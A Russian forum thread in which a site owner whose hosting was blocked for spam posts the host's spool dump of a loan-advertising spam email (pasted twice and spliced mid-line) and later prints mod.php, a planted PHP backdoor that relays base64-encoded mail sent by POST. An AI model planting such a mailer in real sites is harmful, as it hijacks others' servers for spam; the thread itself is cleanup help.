Ваша хостинговая площадка была заблокирована за SPAM помогите пожалуйста

[icecream]

Доброго времени суток, уважаемые коллеги!

 

Сегодня получил от хостера письмо с причиной блокировки моей площадки, помогите пожалуйста добрыми советами, что делать, где копать ?

 

Если я не ошибаюсь, то спам рассылку ведёт почтовый сервер, а не сам скрипт с внедрёный в движок ?

 

 

Ваша хостинговая площадка #109642 - была заблокирована в соответствии с Приложением 1 к ПУБЛИЧНОМУ ДОГОВОРУ, пункт 2.11.1 раздела ”Общие правила предоставления услуг” подраздела ”Права и обязанности Заказчика”.

Причина - несанкционированная рассылка.

Пример рассылаемых сообщений:

1Waf1t-0007iR-17-H
cp2516** 1169 32008
<cp2516**@cpane**.logol.ru>
1397713113 0
-ident cp2516**
-received_protocol local
-body_linecount 116
-max_received_linelength 81
-auth_id cp2516**
-auth_sender cp2516**@cpane**.logol.ru
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX
1
[email protected]

190P Received: from cp2516** by cpane**.logol.ru with local (Exim 4.80)
(envelope-from <cp2516**@cpane**.logol.ru>)
id 1Waf1t-0007iR-17
for [email protected]; Thu, 17 Apr 2014 09:38:33 +0400
025T To: <[email protected]>
057 Subject: =?windows-1251?B?UmU6IO/uIO/u4u7k8yDq8OXk6PLg?=
079 X-PHP-Script: goods-price.ru/engine/mailout.php for 95.26.230.62, 95.26.230.62
043 X-PHP-Originating-Script: 1169:mailout.php
082I Message-ID: <D2C69F5444874A1384AEFDDEBD9D7B98@128-72-132-53.broadband.corbina.ru>
074R Reply-To: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <[email protected]>
065F From: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <[email protected]>
038 Date: Thu, 17 Apr 2014 09:38:29 +0400
018 MIME-Version: 1.0
091 Content-Type: multipart/alternative;
boundary="----=_NextPart_000_08D5_01CF5A20.CA012640"
014 X-Priority: 3
026 X-MSMail-Priority: Normal
052 X-Mailer: Microsoft Windows Live Mail 14.0.8089.726
056 X-MimeOLE: Produced By Microsoft MimeOLE V14.0.8089.726
1Waf1t-0007iR-17-D
This is a multi-part message in MIME format.

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/plain;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9

=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=E0=F8 =EA=F0=E5=E4=E8=
=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=F0=E8 =EF=EE=EC=EE=F9=
=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=F1.
=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=E0=F2=E8=F2=FC =E1=
=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =FD=F2=EE =E4=E5=EB=E0=FE=
=F2 =E7=E0 =C2=E0=F1!

=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF =C2=E0=F1, =E5=F1=
=EB=E8:
=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =E7=E0 =EA=
=F0=E5=E4=E8=F2
=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 =E5=E6=E5=EC=E5=F1=
=FF=F7=ED=EE=E9 =EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.
=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=E0=F2=F3 =EF=EB=E0=
=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3
=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =EA=F0=
=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3
=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5, =E0 =E7=E0=F7=E0=F1=
=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5 =EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5
=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=FE =EA=F0=E5=E4=E8=F2=
=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8 =E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=
=EC
=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 "=ED=E0=E5=
=E7=E4=EE=E2" =EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=
=E2
=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=E0=F2=E8=F2=FC =E7=E0=
=EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5 =EF=EB=E0=F2=E5=E6=E8
=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 107 =F2=FB=F1=FF=F7 =E4=EE=
=EB=E3=EE=E2 =E7=E0 2 =E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2=
.
=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=EB =E1=EE=EB=E5=E5=
23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.

=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=E9=F7=E0=F1 =E8 =
=E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=EE=E2 - http://i=
s.gd/9LOjbF

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Dwindows-1251" http-equiv=3DContent-=
Type>
<META name=3DGENERATOR content=3D"MSHTML 9.00.8112.16437">
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft>=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dcenter>=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=
=E0=F8 =EA=F0=E5=E4=E8=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=
=F0=E8=20
=EF=EE=EC=EE=F9=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=
=F1.</DIV>
<DIV align=3Dcenter>=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=
=E0=F2=E8=F2=FC =E1=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =
=FD=F2=EE=20
=E4=E5=EB=E0=FE=F2 =E7=E0 =C2=E0=F1!</DIV>
<DIV align=3Dcenter> </DIV>
<DIV align=3Dleft>=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF=
=C2=E0=F1, =E5=F1=EB=E8:</DIV>
<UL>
<LI>
<DIV align=3Dleft>=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=
=E5=F2=E5 =E7=E0 =EA=F0=E5=E4=E8=F2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=
=F2 =E5=E6=E5=EC=E5=F1=FF=F7=ED=EE=E9=20
=EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.</DIV>
<LI>
<DIV align=3Dleft>=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=
=E0=F2=F3 =EF=EB=E0=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=
=E8=E2=E0=E5=F2=E5 =EA=F0=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3</DIV>
<LI>
<DIV align=3Dleft>=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5=
, =E0 =E7=E0=F7=E0=F1=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5=20
=EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =F3=EB=F3=F71Waf1t-0007iR-17-H
cp2516** 1169 32008
<cp251618@cpanel**.logol.ru>
1397713113 0
-ident cp2516**
-received_protocol local
-body_linecount 116
-max_received_linelength 81
-auth_id cp2516**
-auth_sender cp2516**@cpanel**.logol.ru
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX
1
[email protected]

190P Received: from cp2516** by cpanel9.logol.ru with local (Exim 4.80)
(envelope-from <cp2516**@cpanel**.logol.ru>)
id 1Waf1t-0007iR-17
for [email protected]; Thu, 17 Apr 2014 09:38:33 +0400
025T To: <[email protected]>
057 Subject: =?windows-1251?B?UmU6IO/uIO/u4u7k8yDq8OXk6PLg?=
079 X-PHP-Script: goods-price.ru/engine/mailout.php for 95.26.230.62, 95.26.230.62
043 X-PHP-Originating-Script: 1169:mailout.php
082I Message-ID: <D2C69F5444874A1384AEFDDEBD9D7B98@128-72-132-53.broadband.corbina.ru>
074R Reply-To: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <[email protected]>
065F From: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <[email protected]>
038 Date: Thu, 17 Apr 2014 09:38:29 +0400
018 MIME-Version: 1.0
091 Content-Type: multipart/alternative;
boundary="----=_NextPart_000_08D5_01CF5A20.CA012640"
014 X-Priority: 3
026 X-MSMail-Priority: Normal
052 X-Mailer: Microsoft Windows Live Mail 14.0.8089.726
056 X-MimeOLE: Produced By Microsoft MimeOLE V14.0.8089.726
1Waf1t-0007iR-17-D
This is a multi-part message in MIME format.

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/plain;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9

=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=E0=F8 =EA=F0=E5=E4=E8=
=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=F0=E8 =EF=EE=EC=EE=F9=
=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=F1.
=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=E0=F2=E8=F2=FC =E1=
=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =FD=F2=EE =E4=E5=EB=E0=FE=
=F2 =E7=E0 =C2=E0=F1!

=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF =C2=E0=F1, =E5=F1=
=EB=E8:
=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =E7=E0 =EA=
=F0=E5=E4=E8=F2
=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 =E5=E6=E5=EC=E5=F1=
=FF=F7=ED=EE=E9 =EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.
=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=E0=F2=F3 =EF=EB=E0=
=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3
=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =EA=F0=
=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3
=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5, =E0 =E7=E0=F7=E0=F1=
=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5 =EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5
=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=FE =EA=F0=E5=E4=E8=F2=
=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8 =E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=
=EC
=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 "=ED=E0=E5=
=E7=E4=EE=E2" =EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=
=E2
=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=E0=F2=E8=F2=FC =E7=E0=
=EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5 =EF=EB=E0=F2=E5=E6=E8
=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 107 =F2=FB=F1=FF=F7 =E4=EE=
=EB=E3=EE=E2 =E7=E0 2 =E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2=
.
=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=EB =E1=EE=EB=E5=E5=
23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.

=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=E9=F7=E0=F1 =E8 =
=E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=EE=E2 - http://i=
s.gd/9LOjbF

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Dwindows-1251" http-equiv=3DContent-=
Type>
<META name=3DGENERATOR content=3D"MSHTML 9.00.8112.16437">
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft>=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dcenter>=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=
=E0=F8 =EA=F0=E5=E4=E8=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=
=F0=E8=20
=EF=EE=EC=EE=F9=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=
=F1.</DIV>
<DIV align=3Dcenter>=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=
=E0=F2=E8=F2=FC =E1=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =
=FD=F2=EE=20
=E4=E5=EB=E0=FE=F2 =E7=E0 =C2=E0=F1!</DIV>
<DIV align=3Dcenter> </DIV>
<DIV align=3Dleft>=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF=
=C2=E0=F1, =E5=F1=EB=E8:</DIV>
<UL>
<LI>
<DIV align=3Dleft>=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=
=E5=F2=E5 =E7=E0 =EA=F0=E5=E4=E8=F2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=
=F2 =E5=E6=E5=EC=E5=F1=FF=F7=ED=EE=E9=20
=EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.</DIV>
<LI>
<DIV align=3Dleft>=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=
=E0=F2=F3 =EF=EB=E0=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=
=E8=E2=E0=E5=F2=E5 =EA=F0=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3</DIV>
<LI>
<DIV align=3Dleft>=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5=
, =E0 =E7=E0=F7=E0=F1=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5=20
=EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=
=FE =EA=F0=E5=E4=E8=F2=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8=20
=E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=EC</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=
=F1=FF =EE=F2 "=ED=E0=E5=E7=E4=EE=E2"=20
=EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=E2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=
=E0=F2=E8=F2=FC =E7=E0 =EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5=20
=EF=EB=E0=F2=E5=E6=E8</DIV></LI></UL>
<DIV align=3Dleft>=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 10=
7 =F2=FB=F1=FF=F7 =E4=EE=EB=E3=EE=E2 =E7=E0 2=20
=E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2.</DIV>
<DIV align=3Dleft>=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=
=EB =E1=EE=EB=E5=E5 23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dleft>=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=
=E9=F7=E0=F1 =E8 =E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=
=EE=E2 -=20
http://is.gd/9LOjbF</DIV></BODY></HTML>

------=_NextPart_000_08D5_01CF5A20.CA012640--


---------------------------------------------------------------
body hash: f93977fe0ad3f2e9b20733c9585a4c74=F8=E8=F2=FC =F1=E2=EE=
=FE =EA=F0=E5=E4=E8=F2=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8=20
=E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=EC</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=
=F1=FF =EE=F2 "=ED=E0=E5=E7=E4=EE=E2"=20
=EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=E2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=
=E0=F2=E8=F2=FC =E7=E0 =EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5=20
=EF=EB=E0=F2=E5=E6=E8</DIV></LI></UL>
<DIV align=3Dleft>=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 10=
7 =F2=FB=F1=FF=F7 =E4=EE=EB=E3=EE=E2 =E7=E0 2=20
=E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2.</DIV>
<DIV align=3Dleft>=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=
=EB =E1=EE=EB=E5=E5 23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dleft>=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=
=E9=F7=E0=F1 =E8 =E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=
=EE=E2 -=20
http://is.gd/9LOjbF</DIV></BODY></HTML>

------=_NextPart_000_08D5_01CF5A20.CA012640--


---------------------------------------------------------------
body hash: f93977fe0ad3f2e9b20733c9585a4c74

[ravilr]

Ищите на сайте вирус , например это что goods-price.ru/engine/mailout.php. Смотрите как он туда мог попасть. Если есть возможность, восстановите сайт без вируса, а потом пишите хостеру о проделанной работе и просьбой разблокировать сайт.

[icecream]

Ищите на сайте вирус , например это что goods-price.ru/engine/mailout.php. Смотрите как он туда мог попасть. Если есть возможность, восстановите сайт без вируса, а потом пишите хостеру о проделанной работе и просьбой разблокировать сайт.

 

Спасибо Вам большое за подсказку, видел там этот файл, снёс к чёрту этот сайт, всёё равно до него руки не доходят из-за нехатки времени.

 

Скажите пожалуйста, а как вы узнали, что это именно этот домен/сайт ? :)

Я просто в этом письме от хостера вообще ничего не понял )

[icecream]

В корне сайта обнаружил файл mod.php

 

Его содержимое:

 

<?php
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
    {
    echo "indata_error";
    exit;
    }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
    echo "sent_ok";
else
    echo "sent_error";
?>

 

Я в php не силён, но кажется тут что то зашифровано .

 

В папке system обнаружил файл wp-mailer.php .

 

Подскажите пожалуйста, какие необходимо провести действия для полного устранения этого скрипта и избежать подобной ситуации?

Достаточно ли будет удалить эти два файла ?

Могли ли внедрить вредоносный код в системные файлы ?

 

Не знаю, что делать и в php не силён, помогите пожалуйста HALP , можно за денежку

[ravilr]

Искать дыры и вирусы за денежку, дело неблагодарное, если только за деньжища )) т.к возможен и рецидив... и все сначала..

 

да ничего не защифровано там, просто спамят с помощью вашего ресурса. Возможно попало через WP или Joomla или еще какие дыры. 

А какие действия... интернет полон рекомендациями что и как делать.